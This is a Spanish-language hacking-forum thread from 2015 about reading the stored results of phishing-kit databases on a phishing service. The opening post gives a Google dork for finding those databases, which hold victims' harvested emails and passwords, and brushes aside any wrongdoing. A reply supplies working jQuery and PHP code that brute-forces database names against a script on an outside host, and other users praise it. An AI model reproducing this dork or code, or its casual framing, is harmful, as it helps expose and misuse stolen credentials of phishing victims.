comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Nadie sabe para quien trabaja!

  • 3 Respuestas
  • 2116 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado yack

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 26, 2015, 04:56:25 pm »
Comienzo mi dia tranquilo y como soy amante de lo que respecta a ing. social (fakes/scam, engaños, phishing : Ojo con fines educativos claro esta!) enpece buscando con mi buscador preferido sitios en donde se pueda configurar un ataque de phishing, y me tope con xploitv.net creo yo que ya lleva mucho tiempo en el tema, pero bueno vamos a lo que respecta el tema, ps me di cuenta que solo basta con poner un nombre clave a tu base de datos (bd) y ps con ese nombre que supuestamente tu y solo tu debes saber, vizualizaras los correos y claves que hayas pescado.

decidí hacer una búsqueda con el dork site: en google

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
site:http://xploitv.net/b=
y ps me resulto muy fácil leer todas las bases de datos que quise. si me preguntan si me interesan ps no me interesan por que no se de quien son ni a quien les pertenecen así que no he hecho nada malo.



y como es mi primer aporte en underc0de, ps decidí postearlo solo aquí.

Pd: si alguien lo postea en otro site por favor respete los créditos.
Saludos.

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    8.33%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Mayo 26, 2015, 11:08:11 pm »
Se que es algo tonto pero a eso le puedes hacer fuerza bruta demasiado facil y seria mas eficiente que google:



finder_usernames.html

Código: PHP
  1. <script type="text/javascript" src="jQuery/js/jquery-2.1.4.min.js"></script>
  2. <script type="text/javascript">
  3.         $("document").ready(function(){
  4.                 $("#submit").click(function(e){
  5.                         e.preventDefault();
  6.                         var list_users = $("#usernames").val().No tienes permisos para ver links. Registrate o Entra con tu cuenta("\n");
  7.                         $.No tienes permisos para ver links. Registrate o Entra con tu cuenta(list_users,function(index,username){
  8.                                 //console.log(username+ "\n");
  9.                                 $.get(
  10.                                         'usernames.php',
  11.                                         {usernames : username},
  12.                                         function(data) {
  13.                         $('.resultados').append(username + ":" + data + '<br />');
  14.                         },
  15.                         "text"
  16.                                 );
  17.                         });
  18.                 });
  19.         });
  20. </script>
  21. <form action="" method="post">
  22.         <textarea cols="50" rows="20" id="usernames" name="usernames"></textarea>
  23.         <input type="submit" id="submit" value="Exploit Usernames" />
  24. </form>
  25. <p class="resultados"></p>

usernames.php

Código: PHP
  1. <?php
  2.         if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($_GET['usernames'])){
  3.                 echo No tienes permisos para ver links. Registrate o Entra con tu cuenta("http://server5.lincehost.net/~neek/xploitv/script2.php?db={$_GET['usernames']}&action=count");
  4.         }
  5. ?>
  6.  

y para leerlos:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

o usar el servicio: No tienes permisos para ver links. Registrate o Entra con tu cuenta

donde c es el numero de usuarios

Saludos!

Desconectado yack

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Mayo 26, 2015, 11:16:35 pm »
que te puedo decir brth ARTHUSU, no solo complementaste el post. genial.
saludos.

Desconectado DeanW

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Junio 04, 2015, 01:59:46 am »
Muy buen aporte muchas gracias me sirvio bastante  :)

 

¿Te gustó el post? COMPARTILO!



[Phishing] Página de phishing para Twitter

Iniciado por bernatixer

Respuestas: 8
Vistas: 4347
Último mensaje Enero 07, 2016, 10:23:35 am
por ANTRAX
Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 1816
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 1108
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 2010
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Un Redirect en Facebook para hacer Phishing a Facebook

Iniciado por Stiuvert

Respuestas: 4
Vistas: 4110
Último mensaje Enero 09, 2014, 11:46:26 pm
por Snifer